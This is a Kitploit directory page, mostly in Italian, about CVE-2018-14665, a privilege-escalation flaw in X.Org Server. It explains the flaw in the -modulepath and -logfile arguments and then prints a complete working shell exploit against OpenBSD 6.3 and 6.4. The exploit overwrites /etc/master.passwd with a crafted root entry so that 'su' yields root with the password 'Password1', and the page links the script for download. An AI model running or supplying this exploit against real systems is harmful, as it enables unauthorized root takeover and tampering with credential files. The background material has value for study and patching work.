Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-14665 — OpenBsd_CVE-2018-14665 | Kitploit
Strumenti/GitHubGitHub/jas502n/cve-2018-14665
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubjas502n/cve-2018-14665

CVE-2018-14665

OpenBsd_CVE-2018-14665

Vedi Repository
1777 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-14665

0x00 Introduzione

Il ricercatore di sicurezza indiano Narendra Shinde ha scoperto una vulnerabilità critica (CVE-2018-14665) nel pacchetto X.Org Server che consente a un utente normale di elevare i privilegi a root, interessando le principali distribuzioni Linux, tra cui OpenBSD, Debian, Ubuntu, CentOS, Red Hat e Fedora.

Il progetto Xorg X fornisce un'implementazione open source del sistema X Window (noto anche come X11, o semplicemente X, un sistema di finestre per display bitmap. Fornisce il framework di base per l'ambiente GUI: disegnare e spostare finestre sul dispositivo di visualizzazione e interagire con mouse e tastiera).

Shinde ha scoperto che il server Xorg X non gestisce e convalida correttamente almeno i due seguenti argomenti della riga di comando:

-modulepath: imposta il percorso della directory per la ricerca dei moduli del server Xorg,

-logfile: imposta un nuovo file di log per il server Xorg, invece di usare il log predefinito situato in /var/log/Xorg.n.log sulla maggior parte delle piattaforme.

Secondo Narendra Shinde, un utente con privilegi bassi può sfruttarlo per eseguire codice malevolo e sovrascrivere qualsiasi file sul sistema.

La vulnerabilità è stata introdotta nel pacchetto X.Org Server 1.19.0 più di due anni fa.

Xorg ha pubblicato un avviso di sicurezza riguardante la vulnerabilità CVE-2018-14665.

root@kitploit:~
“当X服务器以提升的权限运行时(即,安装Xorg并设置setuid位并由非root用户启动)。”读取Xorg  建议。 

“-modulepath参数可用于指定要在X服务器中加载的模块的不安全路径,允许在特权进程中执行非特权代码。

由于在解析选项时检查不正确,-logfile参数可用于覆盖文件系统中的任意文件。“

0x01 root

L'esperto di sicurezza Matthew Hickey ha pubblicato anche un proof-of-concept exploit che consente a un utente malintenzionato di compromettere un sistema vulnerabile con 3 o meno comandi.

Openbsd 的#0day LPE 通过 CVE-2018-14665 可以从远程 SSH 会话触发, 不需要在本地控制台上。攻击者可以从字面上接管3命令或更少的受影响的系统。

Script di exploit: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

POC:

root@kitploit:~
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was 
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# 
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself 
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a 
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

Nota: dopo il successo, la nuova password di root è Password1. Il file /etc/passwd originale del sistema verrà salvato come backup in /etc/master.passwd.old.

0x02 Collegamenti di riferimento

root@kitploit:~
https://twitter.com/hackerfantastic

https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh
Scarica lo strumento